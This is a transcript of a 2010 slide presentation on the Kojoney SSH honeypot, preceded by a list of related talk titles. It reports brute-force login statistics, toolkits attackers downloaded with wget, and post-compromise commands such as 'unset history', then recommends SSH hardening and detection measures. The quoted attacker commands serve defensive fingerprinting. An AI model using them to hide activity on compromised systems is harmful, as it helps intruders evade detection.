Copyright 2010 Justin C. Klein Keane Using Kojoney Open Source Low Interaction Honeypot to Develop Defensive Strategies and Fingerprint Post-Compromise.

Slides:

Advertisements

Similar presentations

Fred P. Baker CCIE, CCIP(security), CCSA, MCSE+I, MCSE(2000)

Advertisements

©2009 Justin C. Klein Keane PHP Code Auditing Session 3 – Tools of the Trade & Crafting Malicious Input Justin C. Klein Keane

Computer Security: Principles and Practice

Honeypot 서울과학기술대학교 Jeilyn Molina Honeypot is the software or set of computers that are intended to attract attackers, pretending to be weak.

Chapter One The Essence of UNIX.

System Security Scanning and Discovery Chapter 14.

Lesson 19: Configuring Windows Firewall

1 Lecture 20: Firewalls motivation ingredients –packet filters –application gateways –bastion hosts and DMZ example firewall design using firewalls – virtual.

Internet Relay Chat Security Issues By Kelvin Lau and Ming Li.

11 SYSTEMS ADMINISTRATION AND TERMINAL SERVICES Chapter 12.

Nikto LUCA ALEXANDRA ADELA. Nikto  Web server assessment tool  Written by Chris Solo and David Lodge  Released on December 27, 2001  Stable release:

Telnet/SSH: Connecting to Hosts Internet Technology1.

Port Knocking Software Project Presentation Paper Study – Part 1 Group member: Liew Jiun Hau ( ) Lee Shirly ( ) Ong Ivy ( )

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.

Web Security Demystified Justin C. Klein Keane Sr. InfoSec Specialist University of Pennsylvania School of Arts and Sciences Information Security and Unix.

Securing Windows 7 Lesson 10. Objectives Understand authentication and authorization Configure password policies Secure Windows 7 using the Action Center.

Ana Chanaba Robert Huylo

AIS, Passwords Should not be shared Should be changed by user Should be changed frequently and upon compromise (suspected unauthorized disclosure)

Copyright Justin C. Klein HECTOR Security Intelligence Platform Developed for: University of Pennsylvania School of Arts & Science.

Brad Baker CS526 May 7 th, /7/ Project goals 2. Test Environment 3. The Problem 4. Some Solutions 5. ModSecurity Overview 6. ModSecurity.

Drupal Security Securing your Configuration Justin C. Klein Keane University of Pennsylvania School of Arts and Sciences Information Security and Unix.

Remote Desktop Services Remote Desktop Connection Remote Desktop Protocol Remote Assistance Remote Server Administration T0ols.

Firewalls Paper By: Vandana Bhardwaj. What this paper covers? Why you need a firewall? What is firewall? How does a network firewall interact with OSI.

Karlstad University Introduction to Vulnerability Assessment Labs Ge Zhang Dvg-C03.

IDS – Intrusion Detection Systems. Overview  Concept  Concept : “An Intrusion Detection System is required to detect all types of malicious network.

Kirby Kuehl Honeynet Project Member 05/08/2002 Intrusion Deception.

FEATURES & FUNCTIONALITY. Page 2 Agenda Main topics Packet Filter Firewall Application Control Other features.

Business Computing 550 Lesson 6. 2 Security Threats on Web Sites Issues and vulnerabilities 1.Illegal Access and Use (Hacking the system or users exposing.

Honeypots. Introduction A honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems.

ECE4112 Lab 7: Honeypots and Network Monitoring and Forensics Group 13 + Group 14 Allen Brewer Jiayue (Simon) Chen Daniel Chu Chinmay Patel.

Objectives Configure routing in Windows Server 2008 Configure Routing and Remote Access Services in Windows Server 2008 Network Address Translation 1.

Honeypot and Intrusion Detection System

Topics to be covered 1. What are bots,botnet ? 2.How does it work? 4.Prevention of botnet. 3.Types of botnets.

DIT314 ~ Client Operating System & Administration CHAPTER 5 MANAGING USER ACCOUNTS AND GROUPS Prepared By : Suraya Alias.

Firewalls Nathan Long Computer Science 481. What is a firewall? A firewall is a system or group of systems that enforces an access control policy between.

Chapter 13 Users, Groups Profiles and Policies. Learning Objectives Understand Windows XP Professional user accounts Understand the different types of.

Implementing a Port Knocking System in C Honors Thesis Defense by Matt Doyle.

KFSensor Vs Honeyd Honeypot System Sunil Gurung

 Chapter 14 – Security Engineering 1 Chapter 12 Dependability and Security Specification 1.

Computer Networking From LANs to WANs: Hardware, Software, and Security Chapter 13 FTP and Telnet.

1 Security Penetration Testing Angela Davis Mrinmoy Ghosh ECE4112 – Internetwork Security Georgia Institute of Technology.

Securing the Network Infrastructure. Firewalls Typically used to filter packets Designed to prevent malicious packets from entering the network or its.

Networking in Linux. ♦ Introduction A computer network is defined as a number of systems that are connected to each other and exchange information across.

Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.

Copyright Justin C. Klein Security Intelligence From What and Why to How.

Retina Network Security Scanner

Virtualization Technology and Microsoft Virtual PC 2007 YOU ARE WELCOME By : Osama Tamimi.

By Daniel Grim. What Is Windows NT? IPSEC/Windows Firewall NTFS File System Registry Permissions Managing User Accounts Conclusion Outline.

SSH. 2 SSH – Secure Shell SSH is a cryptographic protocol – Implemented in software originally for remote login applications – One most popular software.

Aaron Corso COSC Spring What is LAMP?  A ‘solution stack’, or package of an OS and software consisting of:  Linux  Apache  MySQL  PHP.

Securing a Host Computer BY STEPHEN GOSNER. Definition of a Host  Host  In networking, a host is any device that has an IP address.  Hosts include.

Chapter 12 Operating System Security. Possible for a system to be compromised during the installation process before it can install the latest patches.

NETWORK SECURITY LAB 1170 REHAB ALFALLAJ CT1406. Introduction There are a number of technologies that exist for the sole purpose of ensuring that the.

Chapter 7: Using Network Clients The Complete Guide To Linux System Administration.

Firewalls. Overview of Firewalls As the name implies, a firewall acts to provide secured access between two networks A firewall may be implemented as.

Honeypot as a Service Bedřich Košata • • 26 May 2016.

Common System Exploits Tom Chothia Computer Security, Lecture 17.

Chapter 6: Securing the Cloud

CSCE 548 Student Presentation By Manasa Suthram

Ssh: secure shell.

Working at a Small-to-Medium Business or ISP – Chapter 8

Linux Security Presenter: Dolev Farhi |

A Comprehensive Security Assessment of the Westminster College Unix Lab Jacob Shodd.

Modern Honey Net An Introduction.

File System Implementation

Secure Software Confidentiality Integrity Data Security Authentication

Telnet/SSH Connecting to Hosts Internet Technology.

12/6/2018 Honeypot ICT Infrastructure Sashan

Network hardening Chapter 14.

Web Servers (IIS and Apache)

Presentation transcript:

Copyright 2010 Justin C. Klein Keane Using Kojoney Open Source Low Interaction Honeypot to Develop Defensive Strategies and Fingerprint Post-Compromise Behavior Justin C. Klein Keane Sr. InfoSec Specialist University of Pennsylvania, School of Arts and Sciences

Copyright 2010 Justin C. Klein Keane Background SSH  Secure replacement for telnet  RFC defined protocol (open)  Available on most Linux/Unix machines Ongoing brute force attacks are seen on SSH servers Unfortunately we don't know what are attackers after  Tempting logical fallacy to assume motivation  Threat modeling and risk analysis depend on knowing motivation

Copyright 2010 Justin C. Klein Keane Honeypots What is a honeypot?  Service deliberately configured to attract malicious attention Why would you use one?  Tar pit, waste attacker time  Early warning, warn of attacks  Profiling, determine the types of attacks that are being utilized against your resources

Copyright 2010 Justin C. Klein Keane Types of Honeypots High interaction  Full system installation  Advantage is attacker has a full stack to interact with  Disadvantage is attacker has more tools, could hide or break out of the honeypot Low interaction  Software implementation that simulates a system  Controlled environment, but is much easier for attackers to detect

Copyright 2010 Justin C. Klein Keane Danger! Downstream liability  Attackers could user your honeypot as a launching pad to attack others  Attackers could host malicious content on your server  Attacker could use your honeypot as a dump site for illegal material Pivot point  Attackers could end-run access control to internal resources using the honeypot

Copyright 2010 Justin C. Klein Keane Logistical Considerations Resource intensive  Set up is time consuming, installation of OS and configuring software  Analysis – it takes time to pore through logs and recreate attacker activity  Redeployment can be a hassle, although virtual machine snap-shots make this much easier

Copyright 2010 Justin C. Klein Keane Kojoney Open source low interaction SSH honeypot  Written in Python so it should work on any platfrom Has some flaws...  Static timestamps, many commands unsupported, limited filesystem, etc.

Copyright 2010 Justin C. Klein Keane How Kojoney Works How it works  Negotiates a full SSH session with attackers  Takes attacker input, logs it, examines it and responds with simulated output  Allows attackers to download toolkits with wget and curl, but stores the files outside the sandbox

Copyright 2010 Justin C. Klein Keane Customization Modified interaction to appear more dynamic Updated directories, using the defaults can be a dead giveaway Added directory functionality so attackers can navigate the structure, create and remove directories Added support for “requested” commands, if we saw attempts to use an unsupported command we built support in Added MySQL database support where all login data and commands are stored which makes reporting and analysis much easier

Copyright 2010 Justin C. Klein Keane Setup Kojoney running October 27, 2009, through May 3, Commodity desktop hardware, just an old Pentium powered machine with 512 MB RAM Dedicated IP Separate management interface

Copyright 2010 Justin C. Klein Keane Data Set Observed 109,121 login attempts 596 distinct IP addresses 70 IP's participated in multiple attacks Longest span between attacks was 135 days

Copyright 2010 Justin C. Klein Keane Attacks per Hour

Copyright 2010 Justin C. Klein Keane Attacks per Day

Copyright 2010 Justin C. Klein Keane Attacks per Month

Copyright 2010 Justin C. Klein Keane Top 16 Attacks by Country

Copyright 2010 Justin C. Klein Keane Top 20 Usernames

Copyright 2010 Justin C. Klein Keane Top 20 Passwords

Copyright 2010 Justin C. Klein Keane Most Popular Commands (3,062 issued, 181 distinct)

Copyright 2010 Justin C. Klein Keane Distinct Commands

Copyright 2010 Justin C. Klein Keane Commands by Session

Copyright 2010 Justin C. Klein Keane Wget Downloads 282 downloads captured Windows XP SP 3 downloaded 41 times Other popular downloads:  PsyBNC  Other IRC bots  UDP Ping Flooders  Port scanners  SSH brute force tools

Copyright 2010 Justin C. Klein Keane Attack Command Analysis Context is key  In 94/150 times 'cat' was used as: cat /proc/cpuinfo Some attacker commands innocuous, others not:  w  uptime  wget  unset

Copyright 2010 Justin C. Klein Keane Target Accounts System accounts favorite targets Dictionary lists were uncommon Passwords were relatively complex  Dictionary attack was uncommon Username 'alice' with password 'password' would withstand attacks

Copyright 2010 Justin C. Klein Keane Defensive Strategies Use SSH keys Disable remote root login over SSH Run SSH on an alternate port Use login attempt limits to frustrate brute force

Copyright 2010 Justin C. Klein Keane Detection Mechanisms Blacklist using: OSSEC  SSH Black 

Copyright 2010 Justin C. Klein Keane Conclusions Blocking by source IP may be feasible Limit access by time of day Use IP to seed examination of other logs 'trojan' certain programs to log activity

Copyright 2010 Justin C. Klein Keane Known Hostile Traffic Look for internal source Use IP as seed for log analysis Fingerprint malware captures Look for traceable activity  Creating directories with names like.tmp  unset history